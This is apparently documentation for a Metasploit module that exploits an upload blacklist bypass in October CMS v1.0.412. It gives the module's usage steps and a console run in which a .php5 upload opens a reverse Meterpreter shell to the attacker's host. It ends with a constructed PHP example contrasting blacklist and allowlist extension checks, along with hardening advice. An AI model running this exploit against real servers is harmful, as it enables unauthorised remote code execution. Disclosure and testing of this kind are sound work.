## Description

An authenticated user with permission to upload and manage media contents can upload various files to the server. The application prevents the user from uploading PHP code by checking the file extension. It uses a blacklist-based approach, as seen in `octobercms/vendor/october/rain/src/Filesystem/Definitions.php:blockedExtensions()`.

## Vulnerable Software

October CMS v1.0.412 (build 412)

https://www.exploit-db.com/apps/4ff8a9688f31b7338020d0bc85da13fc-october-1.0.412.tar.gz

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/multi/http/october_upload_bypass_exec```
4. Do: ```set RHOSTS```
5. Do: ```set USERNAME```
6. Do: ```set PASSWORD```
7. You should get a shell.

## Verification Steps

```
msf5 > use exploit/multi/http/october_upload_bypass_exec
msf5 exploit(multi/http/october_upload_bypass_exec) > set rhosts 10.10.10.16
rhosts => 10.10.10.16
msf5 exploit(multi/http/october_upload_bypass_exec) > setg verbose true
verbose => true
msf5 exploit(multi/http/october_upload_bypass_exec) > set lhost 10.10.14.8
lhost => 10.10.14.8
msf5 exploit(multi/http/october_upload_bypass_exec) > run

[*] Started reverse TCP handler on 10.10.14.8:4444
[+] Token for login : 3ySsc8d8VNMm2V8x3Ns4cay05bwhRxnoIkQjRnBP
[+] Session Key for login : uVNSZ2YRUm39cf8kqJcWV0qr9xhqq9krCYHeVI6m
[*] Trying to Login ......
[+] Authentication successful: admin:admin
[*] Trying to upload malicious WLMVDKmVpCX.php5 file ....
[*] Sending stage (38247 bytes) to 10.10.10.16
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.16:54124) at 2019-09-03 12:19:20 +0530
[+] Deleted WLMVDKmVpCX.php5

meterpreter > sysinfo
Computer : october
OS : Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686
Meterpreter : php/linux
meterpreter >
```
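
The blacklist check named in the Description, set beside an allowlist check, as an added example (not October CMS code and not part of the module). The function names, both extension lists and the sample filenames are constructed for illustration, except `WLMVDKmVpCX.php5`, which is the filename from the run above.

```php
<?php
// Added example, not October CMS code. Both lists are constructed and are
// NOT the contents of blockedExtensions().

// Blacklist check: reject only extensions that appear on a known-bad list.
function passesBlacklist(string $filename, array $blocked): bool
{
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $blocked, true);
}

// Allowlist check: accept only extensions the media library is meant to store.
function passesAllowlist(string $filename, array $allowed): bool
{
    // Work on the final path component only, whatever separator was sent.
    $name = basename(str_replace('\\', '/', $filename));
    if ($name === '' || preg_match('/[\x00-\x1f]/', $name)) {
        return false; // empty name or control bytes
    }
    // Require exactly "<name>.<ext>". This is deliberately strict: names with
    // more than one dot are refused rather than interpreted.
    $parts = explode('.', $name);
    if (count($parts) !== 2 || $parts[0] === '') {
        return false;
    }
    return in_array(strtolower($parts[1]), $allowed, true);
}

$blocked = ['php', 'php3', 'php4', 'phtml'];             // constructed blacklist
$allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];  // constructed allowlist

// Constructed sample names; the .php5 name is the one shown in the run above.
$samples = ['photo.jpg', 'index.php', 'INDEX.PHP', 'WLMVDKmVpCX.php5',
            'report.pdf', 'notes.v2.txt'];

printf("%-18s %-10s %s\n", 'filename', 'blacklist', 'allowlist');
foreach ($samples as $file) {
    printf(
        "%-18s %-10s %s\n",
        $file,
        passesBlacklist($file, $blocked) ? 'accept' : 'reject',
        passesAllowlist($file, $allowed) ? 'accept' : 'reject'
    );
}
```

Which extensions are executed is decided by the web server's handler configuration rather than by the application, so an allowlist is best paired with serving the media directory with script execution disabled.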